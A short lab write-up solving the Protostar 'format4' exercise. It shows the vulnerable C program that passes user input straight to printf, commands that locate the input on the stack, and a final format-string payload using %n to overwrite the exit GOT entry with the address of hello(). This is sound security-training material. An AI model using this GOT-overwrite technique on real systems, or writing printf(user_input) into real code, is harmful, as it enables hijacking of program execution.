This is the last task of protostar format string vulnerable. I get a lot of experience from this lab. Thanks.
Description.
%p format4 looks at one method of redirecting execution in a process. Hints objdump -TR is your friend This level is at /opt/protostar/bin/format4
Format4.c
#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int target; void hello() { printf("code execution redirected! you win\n"); _exit(1); } void vuln() { char buffer[512]; fgets(buffer, sizeof(buffer), stdin); printf(buffer); exit(1); } int main(int argc, char **argv) { vuln(); }
This task is little different with previous task. Need to call hello function to get flag. let’s try.
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%08x."*100')) | ./format4 AAAA00000200.b7fd8420.bffff614.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.
AAAA was located on position 4.
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%4$08x."')) | ./format4 AAAA41414141.
In this task, we need to exit from function and call to hello function. so need to get the address of exit. we can use objdump again.
[email protected]:/opt/protostar/bin$ objdump -TR ./format4 ./format4: file format elf32-i386 DYNAMIC SYMBOL TABLE: 00000000 w D *UND* 00000000 __gmon_start__ 00000000 DF *UND* 00000000 GLIBC_2.0 fgets 00000000 DF *UND* 00000000 GLIBC_2.0 __libc_start_main 00000000 DF *UND* 00000000 GLIBC_2.0 _exit 00000000 DF *UND* 00000000 GLIBC_2.0 printf 00000000 DF *UND* 00000000 GLIBC_2.0 puts 00000000 DF *UND* 00000000 GLIBC_2.0 exit 080485ec g DO .rodata 00000004 Base _IO_stdin_used 08049730 g DO .bss 00000004 GLIBC_2.0 stdin DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 080496fc R_386_GLOB_DAT __gmon_start__ 08049730 R_386_COPY stdin 0804970c R_386_JUMP_SLOT __gmon_start__ 08049710 R_386_JUMP_SLOT fgets 08049714 R_386_JUMP_SLOT __libc_start_main 08049718 R_386_JUMP_SLOT _exit 0804971c R_386_JUMP_SLOT printf 08049720 R_386_JUMP_SLOT puts 08049724 R_386_JUMP_SLOT exit
Now,we got exit(1) address 0x08049724.
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\x24\x97\x04\x08"+"%4$08x."')) | ./format4 $�08049724.
Now we need again hello function address.
[email protected]:/opt/protostar/bin$ objdump -t ./format4 | grep hello 080484b4 g F .text 0000001e hello
calculate it.
[email protected]:/opt/protostar/bin$ let x=0x080484b4; echo $x; 134513844
and remove 4 bytes. 134513844 – 4 = 134513840
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\x24\x97\x04\x08"+"%134513840u"+"%4$08n"')) | ./format4